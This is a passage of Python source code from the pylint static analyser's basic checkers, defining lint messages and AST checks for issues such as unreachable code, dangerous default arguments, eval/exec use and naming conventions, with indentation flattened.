# Check for duplicate names by clustering args with same name for detailed report
arg_clusters = collections.defaultdict(list)
arguments = filter(None, [node.args.args, node.args.kwonlyargs])
for arg in itertools.chain.from_iterable(arguments):
arg_clusters[arg.name].append(arg)
# provide detailed report about each repeated argument
for argument_duplicates in arg_clusters.values():
if len(argument_duplicates) != 1:
for argument in argument_duplicates:
self.add_message(
"duplicate-argument-name",
line=argument.lineno,
node=argument,
args=(argument.name,),
)
visit_asyncfunctiondef = visit_functiondef
def _check_name_used_prior_global(self, node):
scope_globals = {
name: child
for child in node.nodes_of_class(astroid.Global)
for name in child.names
if child.scope() is node
}
if not scope_globals:
return
for node_name in node.nodes_of_class(astroid.Name):
if node_name.scope() is not node:
continue
name = node_name.name
corresponding_global = scope_globals.get(name)
if not corresponding_global:
continue
global_lineno = corresponding_global.fromlineno
if global_lineno and global_lineno > node_name.fromlineno:
self.add_message(
"used-prior-global-declaration", node=node_name, args=(name,)
)
def _check_nonlocal_and_global(self, node):
"""Check that a name is both nonlocal and global."""
def same_scope(current):
return current.scope() is node
from_iter = itertools.chain.from_iterable
nonlocals = set(
from_iter(
child.names
for child in node.nodes_of_class(astroid.Nonlocal)
if same_scope(child)
)
)
if not nonlocals:
return
global_vars = set(
from_iter(
child.names
for child in node.nodes_of_class(astroid.Global)
if same_scope(child)
)
)
for name in nonlocals.intersection(global_vars):
self.add_message("nonlocal-and-global", args=(name,), node=node)
@utils.check_messages("return-outside-function")
def visit_return(self, node):
if not isinstance(node.frame(), astroid.FunctionDef):
self.add_message("return-outside-function", node=node)
@utils.check_messages("yield-outside-function")
def visit_yield(self, node):
self._check_yield_outside_func(node)
@utils.check_messages("yield-outside-function")
def visit_yieldfrom(self, node):
self._check_yield_outside_func(node)
@utils.check_messages("not-in-loop", "continue-in-finally")
def visit_continue(self, node):
self._check_in_loop(node, "continue")
@utils.check_messages("not-in-loop")
def visit_break(self, node):
self._check_in_loop(node, "break")
@utils.check_messages("useless-else-on-loop")
def visit_for(self, node):
self._check_else_on_loop(node)
@utils.check_messages("useless-else-on-loop")
def visit_while(self, node):
self._check_else_on_loop(node)
@utils.check_messages("nonexistent-operator")
def visit_unaryop(self, node):
"""check use of the non-existent ++ and -- operator operator"""
if (
(node.op in "+-")
and isinstance(node.operand, astroid.UnaryOp)
and (node.operand.op == node.op)
):
self.add_message("nonexistent-operator", node=node, args=node.op * 2)
def _check_nonlocal_without_binding(self, node, name):
current_scope = node.scope()
while True:
if current_scope.parent is None:
break
if not isinstance(current_scope, (astroid.ClassDef, astroid.FunctionDef)):
self.add_message("nonlocal-without-binding", args=(name,), node=node)
return
if name not in current_scope.locals:
current_scope = current_scope.parent.scope()
continue
# Okay, found it.
return
if not isinstance(current_scope, astroid.FunctionDef):
self.add_message("nonlocal-without-binding", args=(name,), node=node)
@utils.check_messages("nonlocal-without-binding")
def visit_nonlocal(self, node):
for name in node.names:
self._check_nonlocal_without_binding(node, name)
@utils.check_messages("abstract-class-instantiated")
def visit_call(self, node):
"""Check instantiating abstract class with
abc.ABCMeta as metaclass.
"""
try:
for inferred in node.func.infer():
self._check_inferred_class_is_abstract(inferred, node)
except astroid.InferenceError:
return
def _check_inferred_class_is_abstract(self, inferred, node):
if not isinstance(inferred, astroid.ClassDef):
return
klass = utils.node_frame_class(node)
if klass is inferred:
# Don't emit the warning if the class is instantiated
# in its own body or if the call is not an instance
# creation. If the class is instantiated into its own
# body, we're expecting that it knows what it is doing.
return
# __init__ was called
abstract_methods = _has_abstract_methods(inferred)
if not abstract_methods:
return
metaclass = inferred.metaclass()
if metaclass is None:
# Python 3.4 has `abc.ABC`, which won't be detected
# by ClassNode.metaclass()
for ancestor in inferred.ancestors():
if ancestor.qname() == "abc.ABC":
self.add_message(
"abstract-class-instantiated", args=(inferred.name,), node=node
)
break
return
if metaclass.qname() in ABC_METACLASSES:
self.add_message(
"abstract-class-instantiated", args=(inferred.name,), node=node
)
def _check_yield_outside_func(self, node):
if not isinstance(node.frame(), (astroid.FunctionDef, astroid.Lambda)):
self.add_message("yield-outside-function", node=node)
def _check_else_on_loop(self, node):
"""Check that any loop with an else clause has a break statement."""
if node.orelse and not _loop_exits_early(node):
self.add_message(
"useless-else-on-loop",
node=node,
# This is not optimal, but the line previous
# to the first statement in the else clause
# will usually be the one that contains the else:.
line=node.orelse[0].lineno - 1,
)
def _check_in_loop(self, node, node_name):
"""check that a node is inside a for or while loop"""
_node = node.parent
while _node:
if isinstance(_node, (astroid.For, astroid.While)):
if node not in _node.orelse:
return
if isinstance(_node, (astroid.ClassDef, astroid.FunctionDef)):
break
if (
isinstance(_node, astroid.TryFinally)
and node in _node.finalbody
and isinstance(node, astroid.Continue)
):
self.add_message("continue-in-finally", node=node)
_node = _node.parent
self.add_message("not-in-loop", node=node, args=node_name)
def _check_redefinition(self, redeftype, node):
"""check for redefinition of a function / method / class name"""
parent_frame = node.parent.frame()
# Ignore function stubs created for type information
redefinitions = parent_frame.locals[node.name]
defined_self = next(
(local for local in redefinitions if not utils.is_overload_stub(local)),
node,
)
if defined_self is not node and not astroid.are_exclusive(node, defined_self):
# Additional checks for methods which are not considered
# redefined, since they are already part of the base API.
if (
isinstance(parent_frame, astroid.ClassDef)
and node.name in REDEFINABLE_METHODS
):
return
# Skip typing.overload() functions.
if utils.is_overload_stub(node):
return
# Exempt functions redefined on a condition.
if isinstance(node.parent, astroid.If):
# Exempt "if not <func>" cases
if (
isinstance(node.parent.test, astroid.UnaryOp)
and node.parent.test.op == "not"
and isinstance(node.parent.test.operand, astroid.Name)
and node.parent.test.operand.name == node.name
):
return
# Exempt "if <func> is not None" cases
# pylint: disable=too-many-boolean-expressions
if (
isinstance(node.parent.test, astroid.Compare)
and isinstance(node.parent.test.left, astroid.Name)
and node.parent.test.left.name == node.name
and node.parent.test.ops[0][0] == "is"
and isinstance(node.parent.test.ops[0][1], astroid.Const)
and node.parent.test.ops[0][1].value is None
):
return
# Check if we have forward references for this node.
try:
redefinition_index = redefinitions.index(node)
except ValueError:
pass
else:
for redefinition in redefinitions[:redefinition_index]:
inferred = utils.safe_infer(redefinition)
if (
inferred
and isinstance(inferred, astroid.Instance)
and inferred.qname() == TYPING_FORWARD_REF_QNAME
):
return
dummy_variables_rgx = lint_utils.get_global_option(
self, "dummy-variables-rgx", default=None
)
if dummy_variables_rgx and dummy_variables_rgx.match(node.name):
return
self.add_message(
"function-redefined",
node=node,
args=(redeftype, defined_self.fromlineno),
)
class BasicChecker(_BasicChecker):
"""checks for :
* doc strings
* number of arguments, local variables, branches, returns and statements in
functions, methods
* required module attributes
* dangerous default values as arguments
* redefinition of function / method / class
* uses of the global statement
"""
__implements__ = interfaces.IAstroidChecker
name = "basic"
msgs = {
"W0101": (
"Unreachable code",
"unreachable",
'Used when there is some code behind a "return" or "raise" '
"statement, which will never be accessed.",
),
"W0102": (
"Dangerous default value %s as argument",
"dangerous-default-value",
"Used when a mutable value as list or dictionary is detected in "
"a default value for an argument.",
),
"W0104": (
"Statement seems to have no effect",
"pointless-statement",
"Used when a statement doesn't have (or at least seems to) any effect.",
),
"W0105": (
"String statement has no effect",
"pointless-string-statement",
"Used when a string is used as a statement (which of course "
"has no effect). This is a particular case of W0104 with its "
"own message so you can easily disable it if you're using "
"those strings as documentation, instead of comments.",
),
"W0106": (
'Expression "%s" is assigned to nothing',
"expression-not-assigned",
"Used when an expression that is not a function call is assigned "
"to nothing. Probably something else was intended.",
),
"W0108": (
"Lambda may not be necessary",
"unnecessary-lambda",
"Used when the body of a lambda expression is a function call "
"on the same argument list as the lambda itself; such lambda "
"expressions are in all but a few cases replaceable with the "
"function being called in the body of the lambda.",
),
"W0109": (
"Duplicate key %r in dictionary",
"duplicate-key",
"Used when a dictionary expression binds the same key multiple times.",
),
"W0122": (
"Use of exec",
"exec-used",
'Used when you use the "exec" statement (function for Python '
"3), to discourage its usage. That doesn't "
"mean you cannot use it !",
),
"W0123": (
"Use of eval",
"eval-used",
'Used when you use the "eval" function, to discourage its '
"usage. Consider using `ast.literal_eval` for safely evaluating "
"strings containing Python expressions "
"from untrusted sources. ",
),
"W0150": (
"%s statement in finally block may swallow exception",
"lost-exception",
"Used when a break or a return statement is found inside the "
"finally clause of a try...finally block: the exceptions raised "
"in the try clause will be silently swallowed instead of being "
"re-raised.",
),
"W0199": (
"Assert called on a 2-item-tuple. Did you mean 'assert x,y'?",
"assert-on-tuple",
"A call of assert on a tuple will always evaluate to true if "
"the tuple is not empty, and will always evaluate to false if "
"it is.",
),
"W0124": (
'Following "as" with another context manager looks like a tuple.',
"confusing-with-statement",
"Emitted when a `with` statement component returns multiple values "
"and uses name binding with `as` only for a part of those values, "
"as in with ctx() as a, b. This can be misleading, since it's not "
"clear if the context manager returns a tuple or if the node without "
"a name binding is another context manager.",
),
"W0125": (
"Using a conditional statement with a constant value",
"using-constant-test",
"Emitted when a conditional statement (If or ternary if) "
"uses a constant value for its test. This might not be what "
"the user intended to do.",
),
"W0126": (
"Using a conditional statement with potentially wrong function or method call due to missing parentheses",
"missing-parentheses-for-call-in-test",
"Emitted when a conditional statement (If or ternary if) "
"seems to wrongly call a function due to missing parentheses",
),
"W0127": (
"Assigning the same variable %r to itself",
"self-assigning-variable",
"Emitted when we detect that a variable is assigned to itself",
),
"W0128": (
"Redeclared variable %r in assignment",
"redeclared-assigned-name",
"Emitted when we detect that a variable was redeclared in the same assignment.",
),
"E0111": (
"The first reversed() argument is not a sequence",
"bad-reversed-sequence",
"Used when the first argument to reversed() builtin "
"isn't a sequence (does not implement __reversed__, "
"nor __getitem__ and __len__",
),
"E0119": (
"format function is not called on str",
"misplaced-format-function",
"Emitted when format function is not called on str object. "
'e.g doing print("value: {}").format(123) instead of '
'print("value: {}".format(123)). This might not be what the user '
"intended to do.",
),
"W0129": (
"Assert statement has a string literal as its first argument. The assert will %s fail.",
"assert-on-string-literal",
"Used when an assert statement has a string literal as its first argument, which will "
"cause the assert to always pass.",
),
}
reports = (("RP0101", "Statistics by type", report_by_type_stats),)
def __init__(self, linter):
_BasicChecker.__init__(self, linter)
self.stats = None
self._tryfinallys = None
def open(self):
"""initialize visit variables and statistics"""
self._tryfinallys = []
self.stats = self.linter.add_stats(module=0, function=0, method=0, class_=0)
@utils.check_messages("using-constant-test", "missing-parentheses-for-call-in-test")
def visit_if(self, node):
self._check_using_constant_test(node, node.test)
@utils.check_messages("using-constant-test", "missing-parentheses-for-call-in-test")
def visit_ifexp(self, node):
self._check_using_constant_test(node, node.test)
@utils.check_messages("using-constant-test", "missing-parentheses-for-call-in-test")
def visit_comprehension(self, node):
if node.ifs:
for if_test in node.ifs:
self._check_using_constant_test(node, if_test)
def _check_using_constant_test(self, node, test):
const_nodes = (
astroid.Module,
astroid.scoped_nodes.GeneratorExp,
astroid.Lambda,
astroid.FunctionDef,
astroid.ClassDef,
astroid.bases.Generator,
astroid.UnboundMethod,
astroid.BoundMethod,
astroid.Module,
)
structs = (astroid.Dict, astroid.Tuple, astroid.Set)
# These nodes are excepted, since they are not constant
# values, requiring a computation to happen.
except_nodes = (
astroid.Call,
astroid.BinOp,
astroid.BoolOp,
astroid.UnaryOp,
astroid.Subscript,
)
inferred = None
emit = isinstance(test, (astroid.Const,) + structs + const_nodes)
if not isinstance(test, except_nodes):
inferred = utils.safe_infer(test)
if emit:
self.add_message("using-constant-test", node=node)
elif isinstance(inferred, const_nodes):
# If the constant node is a FunctionDef or Lambda then
# it may be a illicit function call due to missing parentheses
call_inferred = None
try:
if isinstance(inferred, astroid.FunctionDef):
call_inferred = inferred.infer_call_result()
elif isinstance(inferred, astroid.Lambda):
call_inferred = inferred.infer_call_result(node)
except astroid.InferenceError:
call_inferred = None
if call_inferred:
try:
for inf_call in call_inferred:
if inf_call != astroid.Uninferable:
self.add_message(
"missing-parentheses-for-call-in-test", node=node
)
break
except astroid.InferenceError:
pass
self.add_message("using-constant-test", node=node)
def visit_module(self, _):
"""check module name, docstring and required arguments"""
self.stats["module"] += 1
def visit_classdef(self, node): # pylint: disable=unused-argument
"""check module name, docstring and redefinition
increment branch counter
"""
self.stats["class"] += 1
@utils.check_messages(
"pointless-statement", "pointless-string-statement", "expression-not-assigned"
)
def visit_expr(self, node):
"""Check for various kind of statements without effect"""
expr = node.value
if isinstance(expr, astroid.Const) and isinstance(expr.value, str):
# treat string statement in a separated message
# Handle PEP-257 attribute docstrings.
# An attribute docstring is defined as being a string right after
# an assignment at the module level, class level or __init__ level.
scope = expr.scope()
if isinstance(
scope, (astroid.ClassDef, astroid.Module, astroid.FunctionDef)
):
if isinstance(scope, astroid.FunctionDef) and scope.name != "__init__":
pass
else:
sibling = expr.previous_sibling()
if (
sibling is not None
and sibling.scope() is scope
and isinstance(sibling, (astroid.Assign, astroid.AnnAssign))
):
return
self.add_message("pointless-string-statement", node=node)
return
# Ignore if this is :
# * a direct function call
# * the unique child of a try/except body
# * a yield statement
# * an ellipsis (which can be used on Python 3 instead of pass)
# warn W0106 if we have any underlying function call (we can't predict
# side effects), else pointless-statement
if (
isinstance(
expr, (astroid.Yield, astroid.Await, astroid.Ellipsis, astroid.Call)
)
or (
isinstance(node.parent, astroid.TryExcept)
and node.parent.body == [node]
)
or (isinstance(expr, astroid.Const) and expr.value is Ellipsis)
):
return
if any(expr.nodes_of_class(astroid.Call)):
self.add_message(
"expression-not-assigned", node=node, args=expr.as_string()
)
else:
self.add_message("pointless-statement", node=node)
@staticmethod
def _filter_vararg(node, call_args):
# Return the arguments for the given call which are
# not passed as vararg.
for arg in call_args:
if isinstance(arg, astroid.Starred):
if (
isinstance(arg.value, astroid.Name)
and arg.value.name != node.args.vararg
):
yield arg
else:
yield arg
@staticmethod
def _has_variadic_argument(args, variadic_name):
if not args:
return True
for arg in args:
if isinstance(arg.value, astroid.Name):
if arg.value.name != variadic_name:
return True
else:
return True
return False
@utils.check_messages("unnecessary-lambda")
def visit_lambda(self, node):
"""check whether or not the lambda is suspicious"""
# if the body of the lambda is a call expression with the same
# argument list as the lambda itself, then the lambda is
# possibly unnecessary and at least suspicious.
if node.args.defaults:
# If the arguments of the lambda include defaults, then a
# judgment cannot be made because there is no way to check
# that the defaults defined by the lambda are the same as
# the defaults defined by the function called in the body
# of the lambda.
return
call = node.body
if not isinstance(call, astroid.Call):
# The body of the lambda must be a function call expression
# for the lambda to be unnecessary.
return
if isinstance(node.body.func, astroid.Attribute) and isinstance(
node.body.func.expr, astroid.Call
):
# Chained call, the intermediate call might
# return something else (but we don't check that, yet).
return
call_site = astroid.arguments.CallSite.from_call(call)
ordinary_args = list(node.args.args)
new_call_args = list(self._filter_vararg(node, call.args))
if node.args.kwarg:
if self._has_variadic_argument(call.kwargs, node.args.kwarg):
return
if node.args.vararg:
if self._has_variadic_argument(call.starargs, node.args.vararg):
return
elif call.starargs:
return
if call.keywords:
# Look for additional keyword arguments that are not part
# of the lambda's signature
lambda_kwargs = {keyword.name for keyword in node.args.defaults}
if len(lambda_kwargs) != len(call_site.keyword_arguments):
# Different lengths, so probably not identical
return
if set(call_site.keyword_arguments).difference(lambda_kwargs):
return
# The "ordinary" arguments must be in a correspondence such that:
# ordinary_args[i].name == call.args[i].name.
if len(ordinary_args) != len(new_call_args):
return
for arg, passed_arg in zip(ordinary_args, new_call_args):
if not isinstance(passed_arg, astroid.Name):
return
if arg.name != passed_arg.name:
return
self.add_message("unnecessary-lambda", line=node.fromlineno, node=node)
@utils.check_messages("dangerous-default-value")
def visit_functiondef(self, node):
"""check function name, docstring, arguments, redefinition,
variable names, max locals
"""
self.stats["method" if node.is_method() else "function"] += 1
self._check_dangerous_default(node)
visit_asyncfunctiondef = visit_functiondef
def _check_dangerous_default(self, node):
"""Check for dangerous default values as arguments."""
def is_iterable(internal_node):
return isinstance(internal_node, (astroid.List, astroid.Set, astroid.Dict))
defaults = node.args.defaults or [] + node.args.kw_defaults or []
for default in defaults:
if not default:
continue
try:
value = next(default.infer())
except astroid.InferenceError:
continue
if (
isinstance(value, astroid.Instance)
and value.qname() in DEFAULT_ARGUMENT_SYMBOLS
):
if value is default:
msg = DEFAULT_ARGUMENT_SYMBOLS[value.qname()]
elif isinstance(value, astroid.Instance) or is_iterable(value):
# We are here in the following situation(s):
# * a dict/set/list/tuple call which wasn't inferred
# to a syntax node ({}, () etc.). This can happen
# when the arguments are invalid or unknown to
# the inference.
# * a variable from somewhere else, which turns out to be a list
# or a dict.
if is_iterable(default):
msg = value.pytype()
elif isinstance(default, astroid.Call):
msg = f"{value.name}() ({value.qname()})"
else:
msg = f"{default.as_string()} ({value.qname()})"
else:
# this argument is a name
msg = f"{default.as_string()} ({DEFAULT_ARGUMENT_SYMBOLS[value.qname()]})"
self.add_message("dangerous-default-value", node=node, args=(msg,))
@utils.check_messages("unreachable", "lost-exception")
def visit_return(self, node):
"""1 - check is the node has a right sibling (if so, that's some
unreachable code)
2 - check is the node is inside the finally clause of a try...finally
block
"""
self._check_unreachable(node)
# Is it inside final body of a try...finally bloc ?
self._check_not_in_finally(node, "return", (astroid.FunctionDef,))
@utils.check_messages("unreachable")
def visit_continue(self, node):
"""check is the node has a right sibling (if so, that's some unreachable
code)
"""
self._check_unreachable(node)
@utils.check_messages("unreachable", "lost-exception")
def visit_break(self, node):
"""1 - check is the node has a right sibling (if so, that's some
unreachable code)
2 - check is the node is inside the finally clause of a try...finally
block
"""
# 1 - Is it right sibling ?
self._check_unreachable(node)
# 2 - Is it inside final body of a try...finally bloc ?
self._check_not_in_finally(node, "break", (astroid.For, astroid.While))
@utils.check_messages("unreachable")
def visit_raise(self, node):
"""check if the node has a right sibling (if so, that's some unreachable
code)
"""
self._check_unreachable(node)
@utils.check_messages("exec-used")
def visit_exec(self, node):
"""just print a warning on exec statements"""
self.add_message("exec-used", node=node)
def _check_misplaced_format_function(self, call_node):
if not isinstance(call_node.func, astroid.Attribute):
return
if call_node.func.attrname != "format":
return
expr = utils.safe_infer(call_node.func.expr)
if expr is astroid.Uninferable:
return
if not expr:
# we are doubtful on inferred type of node, so here just check if format
# was called on print()
call_expr = call_node.func.expr
if not isinstance(call_expr, astroid.Call):
return
if (
isinstance(call_expr.func, astroid.Name)
and call_expr.func.name == "print"
):
self.add_message("misplaced-format-function", node=call_node)
@utils.check_messages(
"eval-used", "exec-used", "bad-reversed-sequence", "misplaced-format-function"
)
def visit_call(self, node):
"""visit a Call node -> check if this is not a disallowed builtin
call and check for * or ** use
"""
self._check_misplaced_format_function(node)
if isinstance(node.func, astroid.Name):
name = node.func.name
# ignore the name if it's not a builtin (i.e. not defined in the
# locals nor globals scope)
if not (name in node.frame() or name in node.root()):
if name == "exec":
self.add_message("exec-used", node=node)
elif name == "reversed":
self._check_reversed(node)
elif name == "eval":
self.add_message("eval-used", node=node)
@utils.check_messages("assert-on-tuple", "assert-on-string-literal")
def visit_assert(self, node):
"""check whether assert is used on a tuple or string literal."""
if (
node.fail is None
and isinstance(node.test, astroid.Tuple)
and len(node.test.elts) == 2
):
self.add_message("assert-on-tuple", node=node)
if isinstance(node.test, astroid.Const) and isinstance(node.test.value, str):
if node.test.value:
when = "never"
else:
when = "always"
self.add_message("assert-on-string-literal", node=node, args=(when,))
@utils.check_messages("duplicate-key")
def visit_dict(self, node):
"""check duplicate key in dictionary"""
keys = set()
for k, _ in node.items:
if isinstance(k, astroid.Const):
key = k.value
if key in keys:
self.add_message("duplicate-key", node=node, args=key)
keys.add(key)
def visit_tryfinally(self, node):
"""update try...finally flag"""
self._tryfinallys.append(node)
def leave_tryfinally(self, node): # pylint: disable=unused-argument
"""update try...finally flag"""
self._tryfinallys.pop()
def _check_unreachable(self, node):
"""check unreachable code"""
unreach_stmt = node.next_sibling()
if unreach_stmt is not None:
self.add_message("unreachable", node=unreach_stmt)
def _check_not_in_finally(self, node, node_name, breaker_classes=()):
"""check that a node is not inside a finally clause of a
try...finally statement.
If we found before a try...finally bloc a parent which its type is
in breaker_classes, we skip the whole check."""
# if self._tryfinallys is empty, we're not an in try...finally block
if not self._tryfinallys:
return
# the node could be a grand-grand...-children of the try...finally
_parent = node.parent
_node = node
while _parent and not isinstance(_parent, breaker_classes):
if hasattr(_parent, "finalbody") and _node in _parent.finalbody:
self.add_message("lost-exception", node=node, args=node_name)
return
_node = _parent
_parent = _node.parent
def _check_reversed(self, node):
"""check that the argument to `reversed` is a sequence"""
try:
argument = utils.safe_infer(utils.get_argument_from_call(node, position=0))
except utils.NoSuchArgumentError:
pass
else:
if argument is astroid.Uninferable:
return
if argument is None:
# Nothing was inferred.
# Try to see if we have iter().
if isinstance(node.args[0], astroid.Call):
try:
func = next(node.args[0].func.infer())
except astroid.InferenceError:
return
if getattr(
func, "name", None
) == "iter" and utils.is_builtin_object(func):
self.add_message("bad-reversed-sequence", node=node)
return
if isinstance(argument, (astroid.List, astroid.Tuple)):
return
if isinstance(argument, astroid.Instance):
if any(
ancestor.name == "dict" and utils.is_builtin_object(ancestor)
for ancestor in itertools.chain(
(argument._proxied,), argument._proxied.ancestors()
)
):
# Mappings aren't accepted by reversed(), unless
# they provide explicitly a __reversed__ method.
try:
argument.locals[REVERSED_PROTOCOL_METHOD]
except KeyError:
self.add_message("bad-reversed-sequence", node=node)
return
if hasattr(argument, "getattr"):
# everything else is not a proper sequence for reversed()
for methods in REVERSED_METHODS:
for meth in methods:
try:
argument.getattr(meth)
except astroid.NotFoundError:
break
else:
break
else:
self.add_message("bad-reversed-sequence", node=node)
else:
self.add_message("bad-reversed-sequence", node=node)
@utils.check_messages("confusing-with-statement")
def visit_with(self, node):
# a "with" statement with multiple managers corresponds
# to one AST "With" node with multiple items
pairs = node.items
if pairs:
for prev_pair, pair in zip(pairs, pairs[1:]):
if isinstance(prev_pair[1], astroid.AssignName) and (
pair[1] is None and not isinstance(pair[0], astroid.Call)
):
# Don't emit a message if the second is a function call
# there's no way that can be mistaken for a name assignment.
# If the line number doesn't match
# we assume it's a nested "with".
self.add_message("confusing-with-statement", node=node)
def _check_self_assigning_variable(self, node):
# Detect assigning to the same variable.
scope = node.scope()
scope_locals = scope.locals
rhs_names = []
targets = node.targets
if isinstance(targets[0], astroid.Tuple):
if len(targets) != 1:
# A complex assignment, so bail out early.
return
targets = targets[0].elts
if len(targets) == 1:
# Unpacking a variable into the same name.
return
if isinstance(node.value, astroid.Name):
if len(targets) != 1:
return
rhs_names = [node.value]
elif isinstance(node.value, astroid.Tuple):
rhs_count = len(node.value.elts)
if len(targets) != rhs_count or rhs_count == 1:
return
rhs_names = node.value.elts
for target, lhs_name in zip(targets, rhs_names):
if not isinstance(lhs_name, astroid.Name):
continue
if not isinstance(target, astroid.AssignName):
continue
if isinstance(scope, astroid.ClassDef) and target.name in scope_locals:
# Check that the scope is different than a class level, which is usually
# a pattern to expose module level attributes as class level ones.
continue
if target.name == lhs_name.name:
self.add_message(
"self-assigning-variable", args=(target.name,), node=target
)
def _check_redeclared_assign_name(self, targets):
dummy_variables_rgx = lint_utils.get_global_option(
self, "dummy-variables-rgx", default=None
)
for target in targets:
if not isinstance(target, astroid.Tuple):
continue
found_names = []
for element in target.elts:
if isinstance(element, astroid.Tuple):
self._check_redeclared_assign_name([element])
elif isinstance(element, astroid.AssignName) and element.name != "_":
if dummy_variables_rgx and dummy_variables_rgx.match(element.name):
return
found_names.append(element.name)
names = collections.Counter(found_names)
for name, count in names.most_common():
if count > 1:
self.add_message(
"redeclared-assigned-name", args=(name,), node=target
)
@utils.check_messages("self-assigning-variable", "redeclared-assigned-name")
def visit_assign(self, node):
self._check_self_assigning_variable(node)
self._check_redeclared_assign_name(node.targets)
@utils.check_messages("redeclared-assigned-name")
def visit_for(self, node):
self._check_redeclared_assign_name([node.target])
KNOWN_NAME_TYPES = {
"module",
"const",
"class",
"function",
"method",
"attr",
"argument",
"variable",
"class_attribute",
"class_const",
"inlinevar",
}
HUMAN_READABLE_TYPES = {
"module": "module",
"const": "constant",
"class": "class",
"function": "function",
"method": "method",
"attr": "attribute",
"argument": "argument",
"variable": "variable",
"class_attribute": "class attribute",
"class_const": "class constant",
"inlinevar": "inline iteration",
}
DEFAULT_NAMING_STYLES = {
"module": "snake_case",
"const": "UPPER_CASE",
"class": "PascalCase",
"function": "snake_case",
"method": "snake_case",
"attr": "snake_case",
"argument": "snake_case",
"variable": "snake_case",
"class_attribute": "any",
"class_const": "UPPER_CASE",
"inlinevar": "any",
}
def _create_naming_options():
name_options = []
for name_type in sorted(KNOWN_NAME_TYPES):
human_readable_name = HUMAN_READABLE_TYPES[name_type]
default_style = DEFAULT_NAMING_STYLES[name_type]
name_type = name_type.replace("_", "-")
name_options.append(
(
f"{name_type}-naming-style",
{
"default": default_style,
"type": "choice",
"choices": list(NAMING_STYLES.keys()),
"metavar": "<style>",
"help": "Naming style matching correct %s names."
% (human_readable_name,),
},
)
)
name_options.append(
(
f"{name_type}-rgx",
{
"default": None,
"type": "regexp",
"metavar": "<regexp>",
"help": "Regular expression matching correct %s names. Overrides %s-naming-style."
% (human_readable_name, name_type),
},
)
)
return tuple(name_options)
class NameChecker(_BasicChecker):
msgs = {
"C0103": (
'%s name "%s" doesn\'t conform to %s',
"invalid-name",
"Used when the name doesn't conform to naming rules "
"associated to its type (constant, variable, class...).",
),
"C0104": (
'Disallowed name "%s"',
"disallowed-name",
"Used when the name matches bad-names or bad-names-rgxs- (unauthorized names).",
{
"old_names": [
("C0102", "blacklisted-name"),
]
},
),
"C0144": (
'%s name "%s" contains a non-ASCII unicode character',
"non-ascii-name",
"Used when the name contains at least one non-ASCII unicode character.",
),
"W0111": (
"Name %s will become a keyword in Python %s",
"assign-to-new-keyword",
"Used when assignment will become invalid in future "
"Python release due to introducing new keyword.",
),
}
options = (
(
"good-names",
{
"default": ("i", "j", "k", "ex", "Run", "_"),
"type": "csv",
"metavar": "<names>",
"help": "Good variable names which should always be accepted,"
" separated by a comma.",
},
),
(
"good-names-rgxs",
{
"default": "",
"type": "regexp_csv",
"metavar": "<names>",
"help": "Good variable names regexes, separated by a comma. If names match any regex,"
" they will always be accepted",
},
),
(
"bad-names",
{
"default": ("foo", "bar", "baz", "toto", "tutu", "tata"),
"type": "csv",
"metavar": "<names>",
"help": "Bad variable names which should always be refused, "
"separated by a comma.",
},
),
(
"bad-names-rgxs",
{
"default": "",
"type": "regexp_csv",
"metavar": "<names>",
"help": "Bad variable names regexes, separated by a comma. If names match any regex,"
" they will always be refused",
},
),
(
"name-group",
{
"default": (),
"type": "csv",
"metavar": "<name1:name2>",
"help": (
"Colon-delimited sets of names that determine each"
" other's naming style when the name regexes"
" allow several styles."
),
},
),
(
"include-naming-hint",
{
"default": False,
"type": "yn",
"metavar": "<y_or_n>",
"help": "Include a hint for the correct naming format with invalid-name.",
},
),
(
"property-classes",
{
"default": ("abc.abstractproperty",),
"type": "csv",
"metavar": "<decorator names>",
"help": "List of decorators that produce properties, such as "
"abc.abstractproperty. Add to this list to register "
"other decorators that produce valid properties. "
"These decorators are taken in consideration only for invalid-name.",
},
),
) + _create_naming_options()
KEYWORD_ONSET = {(3, 7): {"async", "await"}}
def __init__(self, linter):
_BasicChecker.__init__(self, linter)
self._name_category = {}
self._name_group = {}
self._bad_names = {}
self._name_regexps = {}
self._name_hints = {}
self._good_names_rgxs_compiled = []
self._bad_names_rgxs_compiled = []
self._non_ascii_rgx_compiled = re.compile("[^\u0000-\u007F]")
def open(self):
self.stats = self.linter.add_stats(
badname_module=0,
badname_class=0,
badname_function=0,
badname_method=0,
badname_attr=0,
badname_const=0,
badname_variable=0,
badname_inlinevar=0,
badname_argument=0,
badname_class_attribute=0,
badname_class_const=0,
)
for group in self.config.name_group:
for name_type in group.split(":"):
self._name_group[name_type] = f"group_{group}"
regexps, hints = self._create_naming_rules()
self._name_regexps = regexps
self._name_hints = hints
self._good_names_rgxs_compiled = [
re.compile(rgxp) for rgxp in self.config.good_names_rgxs
]
self._bad_names_rgxs_compiled = [
re.compile(rgxp) for rgxp in self.config.bad_names_rgxs
]
def _create_naming_rules(self):
regexps = {}
hints = {}
for name_type in KNOWN_NAME_TYPES:
naming_style_option_name = f"{name_type}_naming_style"
naming_style_name = getattr(self.config, naming_style_option_name)
regexps[name_type] = NAMING_STYLES[naming_style_name].get_regex(name_type)
custom_regex_setting_name = f"{name_type}_rgx"
custom_regex = getattr(self.config, custom_regex_setting_name, None)
if custom_regex is not None:
regexps[name_type] = custom_regex
if custom_regex is not None:
hints[name_type] = "%r pattern" % custom_regex.pattern
else:
hints[name_type] = "%s naming style" % naming_style_name
return regexps, hints
@utils.check_messages("disallowed-name", "invalid-name", "non-ascii-name")
def visit_module(self, node):
self._check_name("module", node.name.split(".")[-1], node)
self._bad_names = {}
def leave_module(self, node): # pylint: disable=unused-argument
for all_groups in self._bad_names.values():
if len(all_groups) < 2:
continue
groups = collections.defaultdict(list)
min_warnings = sys.maxsize
for group in all_groups.values():
groups[len(group)].append(group)
min_warnings = min(len(group), min_warnings)
if len(groups[min_warnings]) > 1:
by_line = sorted(
groups[min_warnings],
key=lambda group: min(warning[0].lineno for warning in group),
)
warnings = itertools.chain(*by_line[1:])
else:
warnings = groups[min_warnings][0]
for args in warnings:
self._raise_name_warning(*args)
@utils.check_messages(
"disallowed-name", "invalid-name", "assign-to-new-keyword", "non-ascii-name"
)
def visit_classdef(self, node):
self._check_assign_to_new_keyword_violation(node.name, node)
self._check_name("class", node.name, node)
for attr, anodes in node.instance_attrs.items():
if not any(node.instance_attr_ancestors(attr)):
self._check_name("attr", attr, anodes[0])
@utils.check_messages(
"disallowed-name", "invalid-name", "assign-to-new-keyword", "non-ascii-name"
)
def visit_functiondef(self, node):
# Do not emit any warnings if the method is just an implementation
# of a base class method.
self._check_assign_to_new_keyword_violation(node.name, node)
confidence = interfaces.HIGH
if node.is_method():
